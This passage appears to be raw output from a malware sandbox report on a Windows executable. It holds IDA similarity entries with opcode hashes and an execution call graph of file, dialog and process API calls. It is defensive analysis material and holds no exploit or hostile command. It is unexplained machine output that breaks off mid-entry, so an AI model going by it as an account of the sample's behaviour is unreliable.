                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memcpy$Concurrency::cancel_current_task
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 326894585-0
                                                                                                                                                                          • Opcode ID: fcc1ca9201f93cfaf03321edb2ee6a7dc1da45cc735778481c8395ba575dfbe3
                                                                                                                                                                          • Instruction ID: 5894171e5dc5be173c45c21995e74a74d689375700c85ac61a0f0d673f6b7217
                                                                                                                                                                          • Opcode Fuzzy Hash: fcc1ca9201f93cfaf03321edb2ee6a7dc1da45cc735778481c8395ba575dfbe3
                                                                                                                                                                          • Instruction Fuzzy Hash: B521C423B1D746C9EA66BB11E4883B81194AF047F4F584B30DE6D867D7DE7CE5828300
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharErrorLastMultiWide
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 203985260-0
                                                                                                                                                                          • Opcode ID: 7a3a7f74f73a46a99d90448da18f6bb105881046ef5d0e6d42425b993442300c
                                                                                                                                                                          • Instruction ID: 0104b41075fdb2773f242883cdb59ab6eeef3317c7f322011cedf0bb7c70260f
                                                                                                                                                                          • Opcode Fuzzy Hash: 7a3a7f74f73a46a99d90448da18f6bb105881046ef5d0e6d42425b993442300c
                                                                                                                                                                          • Instruction Fuzzy Hash: 3A212977A28B85C6E3109F11E48832EBBB8F799B94F244238DB8993B55DF3DD4418B00
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: __acrt_iob_func__stdio_common_vfprintffclosefflushfree
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2759974054-0
                                                                                                                                                                          • Opcode ID: 4b8cbb2eab82408cb72d5d77ddd86e032ff70fca4d004e22786f2319a7a853c9
                                                                                                                                                                          • Instruction ID: 0b03cae3bc945467ee69c3d0382f0f3e0eb19a0016294e826539f8f0b39f41ab
                                                                                                                                                                          • Opcode Fuzzy Hash: 4b8cbb2eab82408cb72d5d77ddd86e032ff70fca4d004e22786f2319a7a853c9
                                                                                                                                                                          • Instruction Fuzzy Hash: 31214D67928AC2C1EB55BB61D9CC2B967A0FF84B84F094076CA1DCB254DF3C98C1DB20
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Xlength_error@std@@__std_exception_copy
                                                                                                                                                                          • String ID: string too long
                                                                                                                                                                          • API String ID: 127952674-2556327735
                                                                                                                                                                          • Opcode ID: be8113c23af4f9b38060aa871511fefe5f671834b6e1a0aa4a6fdba527ce7ea1
                                                                                                                                                                          • Instruction ID: 23ca55e40ca55d1decd82df2ebcd885549bec930e7c0f5c48ec29c699718042d
                                                                                                                                                                          • Opcode Fuzzy Hash: be8113c23af4f9b38060aa871511fefe5f671834b6e1a0aa4a6fdba527ce7ea1
                                                                                                                                                                          • Instruction Fuzzy Hash: 87E06D62A24B89D1EF45AF21E8C40B83364EF28B24B44C131DE4C86320EF3CE2E9C300
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: freemalloc
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3061335427-0
                                                                                                                                                                          • Opcode ID: 0f9bca17e66ded67b1a504ccdb50fd1236047b62f8f41b41da83b9a65bfd1941
                                                                                                                                                                          • Instruction ID: fb1e15e10d0a8e418e7ad64b90dad658b5a9da19166d8c18b6c78b0eba7e4e75
                                                                                                                                                                          • Opcode Fuzzy Hash: 0f9bca17e66ded67b1a504ccdb50fd1236047b62f8f41b41da83b9a65bfd1941
                                                                                                                                                                          • Instruction Fuzzy Hash: DCB19923E24B95C6E711DB3594882BEB7A4FF99B85F149332EE4592664DF3CE482C700
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memcpy$freemalloc
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3313557100-0
                                                                                                                                                                          • Opcode ID: a8063b4f172900af7f333b892fdd672f996085ad7b339d79f3029e1be8ffb455
                                                                                                                                                                          • Instruction ID: dac9622f99c7e3eb5bf8da36e9b1aa030ce4d007683f94e2f515a4fb01c5e0af
                                                                                                                                                                          • Opcode Fuzzy Hash: a8063b4f172900af7f333b892fdd672f996085ad7b339d79f3029e1be8ffb455
                                                                                                                                                                          • Instruction Fuzzy Hash: 6B319C73B25A85C6EA14EF1AE5881B8A360FB48B80B089436DF5D87751DF3CE5A1C700

                                                                                                                                                                          Execution Graph

                                                                                                                                                                          Execution Coverage:9.4%
                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                          Signature Coverage:4%
                                                                                                                                                                          Total number of Nodes:1467
                                                                                                                                                                          Total number of Limit Nodes:44
                                                                                                                                                                          execution_graph 25302 63c793 107 API calls 5 library calls 25352 647f6e 52 API calls 3 library calls 25303 648268 55 API calls _free 25353 621f72 128 API calls __EH_prolog 25304 63a070 10 API calls 25306 63b270 99 API calls 24583 629a74 24584 629a7e 24583->24584 24585 629b9d SetFilePointer 24584->24585 24587 62981a 79 API calls 24584->24587 24588 629b79 24584->24588 24589 629ab1 24584->24589 24586 629bb6 GetLastError 24585->24586 24585->24589 24586->24589 24587->24588 24588->24585 25307 621075 84 API calls 24590 629f7a 24591 629f8f 24590->24591 24594 629f88 24590->24594 24592 629f9c GetStdHandle 24591->24592 24595 629fab 24591->24595 24592->24595 24593 62a003 WriteFile 24593->24595 24595->24593 24595->24594 24596 629fd4 WriteFile 24595->24596 24597 629fcf 24595->24597 24599 62a095 24595->24599 24601 626baa 78 API calls 24595->24601 24596->24595 24596->24597 24597->24595 24597->24596 24602 626e98 77 API calls 24599->24602 24601->24595 24602->24594 25309 63a440 GdipCloneImage GdipAlloc 25310 643a40 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25357 651f40 CloseHandle 24617 63e44b 24618 63e3f4 24617->24618 24618->24617 24619 63e85d ___delayLoadHelper2@8 14 API calls 24618->24619 24619->24618 25312 63e455 14 API calls ___delayLoadHelper2@8 24640 63cd58 24641 63ce22 24640->24641 24647 63cd7b _wcschr 24640->24647 24654 63c793 _wcslen _wcsrchr 24641->24654 24668 63d78f 24641->24668 24642 63b314 ExpandEnvironmentStringsW 24642->24654 24644 63d40a 24645 631fbb CompareStringW 24645->24647 24647->24641 24647->24645 24648 63ca67 SetWindowTextW 24648->24654 24651 643e3e 22 API calls 24651->24654 24653 63c855 SetFileAttributesW 24655 63c90f GetFileAttributesW 24653->24655 24666 63c86f __cftof _wcslen 24653->24666 24654->24642 24654->24644 24654->24648 24654->24651 24654->24653 24659 63cc31 GetDlgItem SetWindowTextW SendMessageW 24654->24659 24662 63cc71 SendMessageW 24654->24662 24667 631fbb CompareStringW 24654->24667 24692 63a64d GetCurrentDirectoryW 24654->24692 24694 62a5d1 6 API calls 24654->24694 24695 62a55a FindClose 24654->24695 24696 63b48e 76 API calls 2 library calls 24654->24696 24655->24654 24658 63c921 DeleteFileW 24655->24658 24658->24654 24660 63c932 24658->24660 24659->24654 24661 624092 _swprintf 51 API calls 24660->24661 24663 63c952 GetFileAttributesW 24661->24663 24662->24654 24663->24660 24664 63c967 MoveFileW 24663->24664 24664->24654 24665 63c97f MoveFileExW 24664->24665 24665->24654 24666->24654 24666->24655 24693 62b991 51 API calls 3 library calls 24666->24693 24667->24654 24672 63d799 __cftof _wcslen 24668->24672 24669 63d9e7 24669->24654 24670 63d9c0 24670->24669 24676 63d9de ShowWindow 24670->24676 24671 63d8a5 24673 62a231 3 API calls 24671->24673 24672->24669 24672->24670 24672->24671 24697 631fbb CompareStringW 24672->24697 24675 63d8ba 24673->24675 24677 63d8d9 ShellExecuteExW 24675->24677 24698 62b6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 24675->24698 24676->24669 24677->24669 24684 63d8ec 24677->24684 24679 63d8d1 24679->24677 24680 63d925 24699 63dc3b 6 API calls 24680->24699 24681 63d97b CloseHandle 24682 63d989 24681->24682 24683 63d994 24681->24683 24700 631fbb CompareStringW 24682->24700 24683->24670 24684->24680 24684->24681 24687 63d91b ShowWindow 24684->24687 24687->24680 24688 63d93d 24688->24681 24689 63d950 GetExitCodeProcess 24688->24689 24689->24681 24690 63d963 24689->24690 24690->24681 24692->24654 24693->24666 24694->24654 24695->24654 24696->24654 24697->24671 24698->24679 24699->24688 24700->24683 25314 63c220 93 API calls _swprintf 25316 64f421 21 API calls __vsnwprintf_l 25317 621025 29 API calls 25361 63f530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25362 63ff30 LocalFree 25162 64bb30 25163 64bb39 25162->25163 25164 64bb42 25162->25164 25166 64ba27 25163->25166 25167 6497e5 _abort 38 API calls 25166->25167 25168 64ba34 25167->25168 25186 64bb4e 25168->25186 25170 64ba3c 25195 64b7bb 25170->25195 25173 64ba53 25173->25164 25174 648e06 __vsnwprintf_l 21 API calls 25175 64ba64 25174->25175 25185 64ba96 25175->25185 25202 64bbf0 25175->25202 25178 648dcc _free 20 API calls 25178->25173 25179 64ba91 25212 6491a8 20 API calls _abort 25179->25212 25181 64bada 25181->25185 25213 64b691 26 API calls 25181->25213 25182 64baae 25182->25181 25183 648dcc _free 20 API calls 25182->25183 25183->25181 25185->25178 25187 64bb5a ___scrt_is_nonwritable_in_current_image 25186->25187 25188 6497e5 _abort 38 API calls 25187->25188 25190 64bb64 25188->25190 25193 64bbe8 _abort 25190->25193 25194 648dcc _free 20 API calls 25190->25194 25214 648d24 38 API calls _abort 25190->25214 25215 64ac31 EnterCriticalSection 25190->25215 25216 64bbdf LeaveCriticalSection _abort 25190->25216 25193->25170 25194->25190 25196 644636 __cftof 38 API calls 25195->25196 25197 64b7cd 25196->25197 25198 64b7dc GetOEMCP 25197->25198 25199 64b7ee 25197->25199 25200 64b805 25198->25200 25199->25200 25201 64b7f3 GetACP 25199->25201 25200->25173 25200->25174 25201->25200 25203 64b7bb 40 API calls 25202->25203 25204 64bc0f 25203->25204 25207 64bc60 IsValidCodePage 25204->25207 25209 64bc16 25204->25209 25211 64bc85 __cftof 25204->25211 25205 63fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25206 64ba89 25205->25206 25206->25179 25206->25182 25208 64bc72 GetCPInfo 25207->25208 25207->25209 25208->25209 25208->25211 25209->25205 25217 64b893 GetCPInfo 25211->25217 25212->25185 25213->25185 25215->25190 25216->25190 25223 64b8cd 25217->25223 25226 64b977 25217->25226 25220 63fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25222 64ba23 25220->25222 25222->25209 25227 64c988 25223->25227 25225 64ab78 __vsnwprintf_l 43 API calls 25225->25226 25226->25220 25228 644636 __cftof 38 API calls 25227->25228 25229 64c9a8 MultiByteToWideChar 25228->25229 25233 64c9e6 25229->25233 25239 64ca7e 25229->25239 25231 63fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25235 64b92e 25231->25235 25232 64ca07 __cftof __vsnwprintf_l 25236 64ca78 25232->25236 25238 64ca4c MultiByteToWideChar 25232->25238 25233->25232 25234 648e06 __vsnwprintf_l 21 API calls 25233->25234 25234->25232 25241 64ab78 25235->25241 25246 64abc3 20 API calls _free 25236->25246 25238->25236 25240 64ca68 GetStringTypeW 25238->25240 25239->25231 25240->25236 25242 644636 __cftof 38 API calls 25241->25242 25243 64ab8b 25242->25243 25247 64a95b 25243->25247 25246->25239 25248 64a976 __vsnwprintf_l 25247->25248 25249 64a99c MultiByteToWideChar 25248->25249 25250 64a9c6 25249->25250 25251 64ab50 25249->25251 25256 648e06 __vsnwprintf_l 21 API calls 25250->25256 25258 64a9e7 __vsnwprintf_l 25250->25258 25252 63fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25251->25252 25253 64ab63 25252->25253 25253->25225 25254 64aa30 MultiByteToWideChar 25255 64aa9c 25254->25255 25257 64aa49 25254->25257 25283 64abc3 20 API calls _free 25255->25283 25256->25258 25274 64af6c 25257->25274 25258->25254 25258->25255 25262 64aa73 25262->25255 25265 64af6c __vsnwprintf_l 11 API calls 25262->25265 25263 64aaab 25264 648e06 __vsnwprintf_l 21 API calls 25263->25264 25268 64aacc __vsnwprintf_l 25263->25268 25264->25268 25265->25255 25266 64ab41 25282 64abc3 20 API calls _free 25266->25282 25268->25266 25269 64af6c __vsnwprintf_l 11 API calls 25268->25269 25270 64ab20 25269->25270 25270->25266 25271 64ab2f WideCharToMultiByte 25270->25271 25271->25266 25272 64ab6f 25271->25272 25284 64abc3 20 API calls _free 25272->25284 25275 64ac98 _abort 5 API calls 25274->25275 25276 64af93 25275->25276 25279 64af9c 25276->25279 25285 64aff4 10 API calls 3 library calls 25276->25285 25278 64afdc LCMapStringW 25278->25279 25280 63fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25279->25280 25281 64aa60 25280->25281 25281->25255 25281->25262 25281->25263 25282->25255 25283->25251 25284->25255 25285->25278 25319 64c030 GetProcessHeap 25320 63a400 GdipDisposeImage GdipFree 25321 63d600 70 API calls 25322 646000 QueryPerformanceFrequency QueryPerformanceCounter 25324 64f200 51 API calls 25365 642900 6 API calls 4 library calls 25367 64a700 21 API calls 25368 621710 86 API calls 25369 63ad10 73 API calls 23421 63b7e0 23422 63b7ea __EH_prolog 23421->23422 23589 621316 23422->23589 23425 63b82a 23429 63b89b 23425->23429 23430 63b838 23425->23430 23504 63b841 23425->23504 23426 63bf0f 23668 63d69e 23426->23668 23433 63b92e GetDlgItemTextW 23429->23433 23439 63b8b1 23429->23439 23434 63b878 23430->23434 23435 63b83c 23430->23435 23431 63bf2a SendMessageW 23432 63bf38 23431->23432 23436 63bf52 GetDlgItem SendMessageW 23432->23436 23437 63bf41 SendDlgItemMessageW 23432->23437 23433->23434 23438 63b96b 23433->23438 23442 63b95f KiUserCallbackDispatcher 23434->23442 23434->23504 23440 62e617 53 API calls 23435->23440 23435->23504 23686 63a64d GetCurrentDirectoryW 23436->23686 23437->23436 23443 63b980 GetDlgItem 23438->23443 23587 63b974 23438->23587 23444 62e617 53 API calls 23439->23444 23445 63b85b 23440->23445 23442->23504 23447 63b9b7 SetFocus 23443->23447 23448 63b994 SendMessageW SendMessageW 23443->23448 23449 63b8ce SetDlgItemTextW 23444->23449 23708 62124f SHGetMalloc 23445->23708 23446 63bf82 GetDlgItem 23451 63bfa5 SetWindowTextW 23446->23451 23452 63bf9f 23446->23452 23453 63b9c7 23447->23453 23465 63b9e0 23447->23465 23448->23447 23454 63b8d9 23449->23454 23687 63abab GetClassNameW 23451->23687 23452->23451 23455 62e617 53 API calls 23453->23455 23458 63b8e6 GetMessageW 23454->23458 23454->23504 23459 63b9d1 23455->23459 23456 63be55 23460 62e617 53 API calls 23456->23460 23462 63b8fd IsDialogMessageW 23458->23462 23458->23504 23709 63d4d4 23459->23709 23466 63be65 SetDlgItemTextW 23460->23466 23462->23454 23468 63b90c TranslateMessage DispatchMessageW 23462->23468 23464 63c1fc SetDlgItemTextW 23464->23504 23471 62e617 53 API calls 23465->23471 23469 63be79 23466->23469 23468->23454 23473 62e617 53 API calls 23469->23473 23472 63ba17 23471->23472 23479 624092 _swprintf 51 API calls 23472->23479 23507 63be9c _wcslen 23473->23507 23474 63bff0 23478 63c020 23474->23478 23481 62e617 53 API calls 23474->23481 23475 63b9d9 23599 62a0b1 23475->23599 23476 63c73f 97 API calls 23476->23474 23486 63c73f 97 API calls 23478->23486 23510 63c0d8 23478->23510 23482 63ba29 23479->23482 23485 63c003 SetDlgItemTextW 23481->23485 23488 63d4d4 16 API calls 23482->23488 23483 63ba73 23605 63ac04 SetCurrentDirectoryW 23483->23605 23484 63ba68 GetLastError 23484->23483 23491 62e617 53 API calls 23485->23491 23493 63c03b 23486->23493 23487 63c18b 23489 63c194 EnableWindow 23487->23489 23490 63c19d 23487->23490 23488->23475 23489->23490 23494 63c1ba 23490->23494 23727 6212d3 GetDlgItem EnableWindow 23490->23727 23495 63c017 SetDlgItemTextW 23491->23495 23498 63c072 23493->23498 23505 63c04d 23493->23505 23501 63c1e1 23494->23501 23515 63c1d9 SendMessageW 23494->23515 23495->23478 23496 63ba87 23502 63ba9e 23496->23502 23503 63ba90 GetLastError 23496->23503 23497 62e617 53 API calls 23497->23504 23499 63c0cb 23498->23499 23538 63c73f 97 API calls 23498->23538 23508 63c73f 97 API calls 23499->23508 23501->23504 23516 62e617 53 API calls 23501->23516 23512 63bb20 23502->23512 23517 63baae GetTickCount 23502->23517 23563 63bb11 23502->23563 23503->23502 23725 639ed5 32 API calls 23505->23725 23506 63c1b0 23728 6212d3 GetDlgItem EnableWindow 23506->23728 23511 62e617 53 API calls 23507->23511 23534 63beed 23507->23534 23508->23510 23510->23487 23519 63c169 23510->23519 23533 62e617 53 API calls 23510->23533 23518 63bed0 23511->23518 23520 63bcfb 23512->23520 23521 63bcf1 23512->23521 23522 63bb39 GetModuleFileNameW 23512->23522 23513 63bd56 23624 6212f1 GetDlgItem ShowWindow 23513->23624 23515->23501 23524 63b862 23516->23524 23606 624092 23517->23606 23526 624092 _swprintf 51 API calls 23518->23526 23726 639ed5 32 API calls 23519->23726 23530 62e617 53 API calls 23520->23530 23521->23434 23521->23520 23719 62f28c 82 API calls 23522->23719 23524->23464 23524->23504 23526->23534 23529 63c066 23529->23498 23537 63bd05 23530->23537 23531 63bd66 23625 6212f1 GetDlgItem ShowWindow 23531->23625 23532 63bac7 23609 62966e 23532->23609 23533->23510 23534->23497 23535 63c188 23535->23487 23536 63bb5f 23540 624092 _swprintf 51 API calls 23536->23540 23541 624092 _swprintf 51 API calls 23537->23541 23542 63c0a0 23538->23542 23546 63bb81 CreateFileMappingW 23540->23546 23547 63bd23 23541->23547 23542->23499 23548 63c0a9 DialogBoxParamW 23542->23548 23543 63bd70 23626 62e617 23543->23626 23551 63bbe3 GetCommandLineW 23546->23551 23583 63bc60 __InternalCxxFrameHandler 23546->23583 23560 62e617 53 API calls 23547->23560 23548->23434 23548->23499 23550 63baed 23554 63baff 23550->23554 23555 63baf4 GetLastError 23550->23555 23556 63bbf4 23551->23556 23552 63bc6b ShellExecuteExW 23578 63bc88 23552->23578 23617 62959a 23554->23617 23555->23554 23720 63b425 SHGetMalloc 23556->23720 23557 63bd8c SetDlgItemTextW GetDlgItem 23561 63bdc1 23557->23561 23562 63bda9 GetWindowLongW SetWindowLongW 23557->23562 23565 63bd3d 23560->23565 23631 63c73f 23561->23631 23562->23561 23563->23512 23563->23513 23564 63bc10 23721 63b425 SHGetMalloc 23564->23721 23569 63bc1c 23722 63b425 SHGetMalloc 23569->23722 23570 63bccb 23570->23521 23576 63bce1 UnmapViewOfFile CloseHandle 23570->23576 23571 63c73f 97 API calls 23573 63bddd 23571->23573 23656 63da52 23573->23656 23574 63bc28 23723 62f3fa 82 API calls 2 library calls 23574->23723 23576->23521 23578->23570 23581 63bcb7 Sleep 23578->23581 23580 63bc3f MapViewOfFile 23580->23583 23581->23570 23581->23578 23582 63c73f 97 API calls 23586 63be03 23582->23586 23583->23552 23584 63be2c 23724 6212d3 GetDlgItem EnableWindow 23584->23724 23586->23584 23588 63c73f 97 API calls 23586->23588 23587->23434 23587->23456 23588->23584 23590 621378 23589->23590 23593 62131f 23589->23593 23730 62e2c1 GetWindowLongW SetWindowLongW 23590->23730 23592 621385 23592->23425 23592->23426 23592->23504 23593->23592 23729 62e2e8 62 API calls 2 library calls 23593->23729 23595 621341 23595->23592 23596 621354 GetDlgItem 23595->23596 23596->23592 23597 621364 23596->23597 23597->23592 23598 62136a SetWindowTextW 23597->23598 23598->23592 23601 62a0bb 23599->23601 23600 62a175 23600->23483 23600->23484 23601->23600 23602 62a14c 23601->23602 23731 62a2b2 23601->23731 23602->23600 23603 62a2b2 8 API calls 23602->23603 23603->23600 23605->23496 23769 624065 23606->23769 23610 629678 23609->23610 23611 6296d5 CreateFileW 23610->23611 23612 6296c9 23610->23612 23611->23612 23613 62bb03 GetCurrentDirectoryW 23612->23613 23614 62971f 23612->23614 23615 629704 23613->23615 23614->23550 23615->23614 23616 629708 CreateFileW 23615->23616 23616->23614 23618 6295cf 23617->23618 23619 6295be 23617->23619 23618->23563 23619->23618 23620 6295d1 23619->23620 23621 6295ca 23619->23621 23854 629620 23620->23854 23849 62974e 23621->23849 23624->23531 23625->23543 23627 62e627 23626->23627 23869 62e648 23627->23869 23630 6212f1 GetDlgItem ShowWindow 23630->23557 23632 63c749 __EH_prolog 23631->23632 23633 63bdcf 23632->23633 23892 63b314 23632->23892 23633->23571 23635 63c780 _wcslen _wcsrchr 23635->23633 23637 63b314 ExpandEnvironmentStringsW 23635->23637 23638 63ca67 SetWindowTextW 23635->23638 23643 63c855 SetFileAttributesW 23635->23643 23648 63cc31 GetDlgItem SetWindowTextW SendMessageW 23635->23648 23651 63cc71 SendMessageW 23635->23651 23896 631fbb CompareStringW 23635->23896 23897 63a64d GetCurrentDirectoryW 23635->23897 23899 62a5d1 6 API calls 23635->23899 23900 62a55a FindClose 23635->23900 23901 63b48e 76 API calls 2 library calls 23635->23901 23902 643e3e 23635->23902 23637->23635 23638->23635 23644 63c90f GetFileAttributesW 23643->23644 23655 63c86f __cftof _wcslen 23643->23655 23644->23635 23647 63c921 DeleteFileW 23644->23647 23647->23635 23649 63c932 23647->23649 23648->23635 23650 624092 _swprintf 51 API calls 23649->23650 23652 63c952 GetFileAttributesW 23650->23652 23651->23635 23652->23649 23653 63c967 MoveFileW 23652->23653 23653->23635 23654 63c97f MoveFileExW 23653->23654 23654->23635 23655->23635 23655->23644 23898 62b991 51 API calls 3 library calls 23655->23898 23657 63da5c __EH_prolog 23656->23657 23926 630659 23657->23926 23659 63da8d 23930 625b3d 23659->23930 23661 63daab 23934 627b0d 23661->23934 23665 63dafe 23950 627b9e 23665->23950 23667 63bdee 23667->23582 23669 63d6a8 23668->23669 24444 63a5c6 23669->24444 23672 63d6b5 GetWindow 23673 63d6d5 23672->23673 23674 63bf15 23672->23674 23673->23674 23675 63d6e2 GetClassNameW 23673->23675 23677 63d706 GetWindowLongW 23673->23677 23678 63d76a GetWindow 23673->23678 23674->23431 23674->23432 24449 631fbb CompareStringW 23675->24449 23677->23678 23679 63d716 SendMessageW 23677->23679 23678->23673 23678->23674 23679->23678 23680 63d72c GetObjectW 23679->23680 24450 63a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23680->24450 23682 63d743 24451 63a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23682->24451 24452 63a80c 8 API calls 23682->24452 23685 63d754 SendMessageW DeleteObject 23685->23678 23686->23446 23688 63abf1 23687->23688 23689 63abcc 23687->23689 23691 63abf6 SHAutoComplete 23688->23691 23692 63abff 23688->23692 24455 631fbb CompareStringW 23689->24455 23691->23692 23695 63b093 23692->23695 23693 63abdf 23693->23688 23694 63abe3 FindWindowExW 23693->23694 23694->23688 23696 63b09d __EH_prolog 23695->23696 23697 6213dc 84 API calls 23696->23697 23698 63b0bf 23697->23698 24456 621fdc 23698->24456 23701 